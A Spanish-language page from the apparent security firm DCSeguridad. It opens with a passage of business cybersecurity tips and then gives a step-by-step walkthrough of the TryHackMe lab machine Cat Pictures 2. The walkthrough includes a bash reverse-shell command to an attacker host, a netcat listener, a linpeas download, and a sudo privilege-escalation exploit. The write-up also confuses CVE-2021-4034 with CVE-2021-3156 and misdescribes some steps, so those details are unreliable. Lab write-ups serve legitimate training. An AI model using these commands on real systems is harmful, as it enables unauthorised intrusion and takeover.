Según esta regla, se deben realizar tres copias de seguridad de todos los datos sensibles de la empresa, preferiblemente de manera diaria. Estas copias de seguridad deben almacenarse en al menos dos ubicaciones diferentes, como la nube, un disco local, un disco de red, entre otros. Por último, se aconseja que uno de los dispositivos de almacenamiento se encuentre en un lugar seguro fuera de las instalaciones de la empresa. De esta manera, se establece un sistema de copias de seguridad efectivo que permite proteger y recuperar toda la información en caso de cualquier tipo de ciberataque.

Cerrar siempre la sesión

No seguir este consejo puede tener consecuencias graves relacionadas con el robo de información confidencial por parte de terceros. Por lo tanto, es recomendable cerrar la sesión siempre que se finalice el uso de una cuenta de usuario en cualquier dispositivo.

Contraseñas seguras

El uso de contraseñas, junto con otros métodos de autenticación como huellas dactilares o reconocimiento facial, es fundamental para acceder a dispositivos y servicios en entornos empresariales cada vez más digitalizados.

Sin embargo, el mal uso y la gestión incorrecta de las contraseñas por parte de los empleados pueden generar vulnerabilidades en las organizaciones. Prácticas como anotar contraseñas en papel, reutilizarlas para diferentes programas o compartirlas por correo electrónico son ejemplos de malas prácticas comunes.

Aquí tienes algunos consejos para crear contraseñas seguras:

  • Utiliza contraseñas con una longitud de al menos 8 caracteres.
  • Combina mayúsculas, minúsculas, números y caracteres especiales como paréntesis, arroba, corchetes, etc.
  • Evita elementos personales como nombres o fechas de nacimiento.
  • Evita el uso de palabras simples y fáciles de adivinar para evitar ataques de diccionario.
  • Considera el uso de una cadena de palabras sin relación entre sí.
  • Cambia tus contraseñas al menos cada seis meses.

Además, como parte de nuestra Guía de Ciberseguridad para Empresas, recomendamos utilizar métodos de autenticación adicionales, los cuales exploraremos en los siguientes puntos.

Navegación segura a través de páginas web con protocolo HTTPS

El protocolo HTTPS es un sistema de seguridad diseñado para mejorar la privacidad de los usuarios mientras navegan por internet. Este protocolo permite cifrar toda la información que se envía y recibe entre el dispositivo de navegación del usuario (por ejemplo, un ordenador) y el sitio web al que accede.

Para saber si estamos accediendo a un sitio web seguro, basta con fijarse en la barra de direcciones y verificar que aparece un candado junto a las letras "https". Esta es una forma sencilla de proteger los datos almacenados en cualquier dispositivo y prevenir filtraciones de información.

Empleo de múltiples métodos de autenticación

Además de utilizar contraseñas seguras, se recomienda emplear otros métodos de autenticación, como el envío de contraseñas de un solo uso (OTP, por sus siglas en inglés) a través de SMS, aplicaciones móviles o voz, entre otros.

Esto asegura que el usuario conoce la contraseña para acceder al servicio y también demuestra que realmente es quien afirma ser, ya que proporciona un código que solo él conoce.

La autenticación de doble o múltiples factores representa un mecanismo de seguridad importante para las empresas, y su implementación puede reducir significativamente los riesgos asociados con posibles ciberataques.

Formación interna

Es esencial que las empresas conciencien a todos sus empleados, sin importar su nivel de responsabilidad, sobre la importancia de adoptar prácticas de trabajo seguras para minimizar las posibles consecuencias de un ciberataque.

La formación interna en el ámbito de la ciberseguridad empresarial no debe subestimarse. Actualmente, es una de las principales preocupaciones para las empresas, ya que un ciberataque puede causar un grave daño a su reputación, seguridad y rentabilidad.

Confía en DCSeguridad

En DCSeguridad, somos líderes en ofrecer soluciones de ciberseguridad confiables y efectivas para proteger tu negocio. Nuestro equipo de expertos está comprometido en ayudarte a salvaguardar tu información sensible y evitar ciberataques.

¿Listo para fortalecer la seguridad de tu empresa? No esperes más, contáctanos hoy mismo y descubre cómo podemos adaptar nuestras soluciones a las necesidades específicas de tu negocio. ¡Únete a nuestra comunidad en nuestro canal de Telegram para recibir consejos y actualizaciones exclusivas!

Protege tu negocio y mantén tus datos a salvo con DCSeguridad. ¡Ponte en contacto con nosotros ahora mismo!

Manual paso a paso Cat Pictures 2 TryHackMe

Manual paso a paso Cat Pictures 2 TryHackMe

Este manual proporcionará una guía detallada para llevar a cabo una prueba de penetración en la máquina Cat Pictures 2 TryHackMe https://tryhackme.com/room/catpictures2. Está diseñado específicamente para aquellos que se están iniciando en el campo del pentesting, por lo que se explicarán los puntos más importantes en un lenguaje claro y profesional.

Antes de comenzar, es crucial recordar que debes obtener los permisos adecuados y autorización antes de realizar cualquier actividad de pentesting en sistemas o redes que no te pertenezcan. El cumplimiento de la ética y las regulaciones es fundamental en este campo.

Paso 1: Preparación inicial para Cat Pictures 2 TryHackMe

Antes de iniciar la prueba de penetración, es necesario realizar algunas tareas de preparación:

  1. Crea un directorio de trabajo específico para este proyecto y cámbiate al directorio correspondiente. Esto ayudará a organizar tus archivos y facilitará la gestión de la prueba de penetración.
  2. Agrega la dirección IP de la máquina Cat Pictures 2 a tu archivo de hosts. Esto simplificará el acceso a la máquina durante la prueba.

Paso 2: Actualización del sistema

Es recomendable comenzar por actualizar el sistema objetivo con las últimas actualizaciones disponibles. Esto garantizará que se aprovechen las correcciones de seguridad más recientes, lo que puede dificultar la explotación de vulnerabilidades conocidas.

Paso 3: Identificación de la máquina objetivo

Antes de iniciar cualquier exploración, es útil determinar si la máquina objetivo está en línea y obtener información básica sobre ella. Para hacerlo, realiza un ping a la máquina utilizando el siguiente comando:

ping -c 1 <dirección IP>

Este comando enviará un solo paquete de ping y mostrará la respuesta. Al verificar la conectividad y el valor TTL (Time to Live), podrás identificar el sistema operativo en uso.

Cat Pictures 2 Try Hack Me Ping

Paso 4: Escaneo de puertos de Cat Pictures 2 TryHackMe

El siguiente paso consiste en realizar un escaneo de puertos para identificar los servicios que se ejecutan en la máquina. Utilizaremos la herramienta nmap con una serie de opciones para obtener información detallada:

nmap -A -sCSV --min-rate 5000 -v -n -Pn <dirección IP> -oN nmap_inicial.txt
Cat Pictures 2 Try Hack Me Nmap

Este comando realizará un escaneo exhaustivo de puertos, incluyendo la detección de servicios, versiones, scripts y generará un archivo de salida en formato CSV llamado nmap_inicial.txt.

Analiza el archivo nmap_inicial.txt para identificar los puertos abiertos. Presta especial atención a los puertos 22, 80, 222, 3000 y 8080, ya que se encontraron servicios SSH y servicios web en estos puertos.

Paso 5: Enumeración de directorios web en Cat Pictures 2 TryHackMe

A continuación, procederemos a enumerar los directorios en los servicios web encontrados en los puertos 80, 3000 y 8080 utilizando la herramienta dirb. Ejecuta los siguientes comandos para cada puerto:

dirb http://<dirección IP>:<puerto>

Analiza cuidadosamente los resultados de la enumeración de directorios en busca de posibles puntos de entrada adicionales.

Paso 6: Análisis de imágenes y metadatos

Después de revisar los directorios y no encontrar resultados significativos, nos centraremos en la exploración de los servicios web. Comenzaremos analizando la página de gatos en el puerto 80.

Cat Pictures 2 Try Hack Me Metadatos

Después de investigar durante un tiempo, descubrimos que una de las imágenes en la pestaña "información" contiene pistas sobre los siguientes pasos. Descarga esta imagen utilizando el comando wget:

wget http://<dirección IP>:<puerto>/ruta/a/la/imagen.jpg
Cat Pictures 2 Try Hack Me Wget1

Una vez que hayas descargado la imagen, realiza un análisis de metadatos utilizando la herramienta exiftool:

exiftool imagen.jpg
Cat Pictures 2 Try Hack Me Exiftool

Examina los metadatos de la imagen y busca cualquier información relevante, como títulos ocultos o datos incrustados. Accede a lo que encuentras y Voalà, ya tienes unas credenciales de acceso.

Cat Pictures 2 Tryhackme Credenciales

Paso 7: Acceso a Gitea y descubrimiento de credenciales

Utilizando las credenciales descubiertas en los pasos anteriores, procedemos a acceder al servicio Gitea en el puerto 3000. Al explorar todo en Gitea, encontramos un repositorio local donde descubrimos la primera bandera.

Cat Pictures 2 Tryhacckme Repositories

Además, en el punto anterior, hay un puerto mencionado para acceder a otro apartado del servidor. Para aprovechar esta oportunidad, realizaremos una modificación en uno de los archivos encontrados en el repositorio para obtener un reverse shell.

Cat Pictures 2 Tryhackme 1337

Primero haz pruebas con los botones, veras que en los logs, hay uno que realiza una tarea con uno de los archivos encontrados en el repositorio, y podemos hacer una shell reversa para conseguir un primer acceso al servidor, visita el sitio web revshells.com y genera un codigo bash para el ataque, luego sustituye el command whoami por: bash -c "sh -i >& /dev/tcp/ip_maquina_atacante/puerto/ 0>&1" y guarda el archivo.

Cat Pictures 2 Tryhackme Playbook

Mientras tanto, abre una escucha de Netcat en tu máquina atacante para recibir la conexión entrante del reverse shell. Utiliza el comando nc -lvnp <puerto> en tu máquina atacante, reemplazando <puerto> por el puerto que especificaste en el comando de reverse shell. Una vez abierto, ejecuta la tarea en la pagina de OliveTin.

Cat Pictures 2 Tryhackme Nc
Cat Pictures 2 Tryhackme Olivetin

Una vez que la tarea se haya ejecutado en el servidor, se establecerá una conexión de reverse shell desde el servidor objetivo a tu máquina atacante.

Ahora, tendrás acceso a una shell en el servidor objetivo a través de la conexión de reverse shell. Puedes interactuar con la shell y ejecutar comandos en el servidor.

Para mejorar la shell y tener una experiencia más cómoda, ejecuta el siguiente comando en la shell para iniciar una nueva instancia de bash:

script /dev/null -c bash
Cat Pictures 2 Tryhackme Reverse

Con este proceso, podrás obtener acceso al servidor a través de un reverse shell y mejorar la shell para una mejor interacción.

Paso 8: Escalada de privilegios en Cat Pictures 2 TryHackMe

Una vez dentro de los repositorios en Gitea, busca la primera bandera y continúa explorando. Si es necesario, intenta escalar privilegios utilizando técnicas como sudo, suid o capabilities. Examina cuidadosamente las configuraciones de privilegios y busca posibles vulnerabilidades.

Paso 9: Búsqueda de vulnerabilidades con Linpeas

Si no se encuentra ninguna vulnerabilidad inmediata, procederemos a utilizar la herramienta Linpeas para explorar posibles vulnerabilidades ocultas en el sistema. Descarga el script linpeas.sh en tu máquina atacante ejecutando los siguientes comandos:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

Después, configura un servidor HTTP en tu máquina atacante para compartir el archivo descargado:

python3 -m http.server

En la máquina objetivo, descarga el archivo linpeas.sh utilizando el siguiente comando:

wget http://<dirección IP>:8000/linpeas.sh
Cat Pictures 2 Tryhackme Linpeas

Concede permisos de ejecución al archivo:

chmod +x linpeas.sh

Finalmente, ejecuta el script:

bash ./linpeas.sh

Analiza cuidadosamente los resultados obtenidos por Linpeas en busca de vulnerabilidades o configuraciones incorrectas.

Aquí te dejo un manual de linpeas: https://www.youtube.com/watch?v=OPWYKR7M_Uo

Paso 10: Explotación de la vulnerabilidad CVE-2021-4034 en Cat Pictures 2 TryHackMe

Si Linpeas no revela ninguna vulnerabilidad explotable, es posible que necesitemos buscar vulnerabilidades específicas. En este caso, se menciona una vulnerabilidad conocida, CVE-2021-4034, relacionada con la versión de sudo.

Cat Pictures 2 Tryhackme Linpeas 2

Clona el repositorio https://github.com/blasty/CVE-2021-3156 en tu máquina atacante y comprimelo en .tar, a continuación monta un servidor http con python3 -m http.server y desde la maquina victima descarga el archivo, así como descomprimir el .tar, sigue las instrucciones proporcionadas en el repositorio para aprovechar esta vulnerabilidad y elevar los privilegios a root.

Cat Pictures 2 Tryhackme Root 1
Cat Pictures 2 Tryhackme Root 2

¡Importante! Asegúrate de seguir las mejores prácticas de seguridad y obtener permiso antes de utilizar exploits en sistemas que no te pertenecen.

Conclusión Cat Pictures 2 TryHackMe

Una vez que hayas logrado elevar tus privilegios a root, habrás completado exitosamente el pentesting en la máquina Cat Pictures 2 de Try Hack Me. Recuerda documentar todas las etapas y resultados de tu proceso para futuras referencias.

Resumen Cat Pictures 2 TryHackMe

En este manual, hemos proporcionado una guía paso a paso para realizar una prueba de penetración en la máquina Cat Pictures 2 de Try Hack Me. Comenzamos con la preparación inicial, seguida de la actualización del sistema y la identificación de la máquina objetivo. Luego, realizamos un escaneo de puertos y enumeramos los directorios web en los servicios encontrados. Continuamos con el análisis de imágenes y metadatos, el acceso a Gitea y el descubrimiento de credenciales. Después, nos enfocamos en el escalamiento de privilegios y la búsqueda de vulnerabilidades ocultas utilizando Linpeas. Finalmente, exploramos una vulnerabilidad conocida (CVE-2021-4034) y concluimos el proceso.

Esta máquina Cat Pictures 2 de Try Hack Me ofrece un nivel de dificultad medio, lo que la convierte en un buen desafío para aquellos que se están iniciando en el pentesting. Te recomendamos seguir practicando y mejorando tus habilidades en este emocionante campo.

Si estás interesado en obtener más información sobre seguridad y pentesting, te invitamos a ponerte en contacto con nosotros en DCSeguridad. Nuestra empresa cuenta con expertos en seguridad que pueden ayudarte en tus proyectos y desafíos. También puedes unirte a nuestro canal de Telegram para mantenerte actualizado sobre las últimas noticias y recursos en el mundo de la seguridad.

¡Te deseamos buena suerte en tus futuras aventuras de pentesting!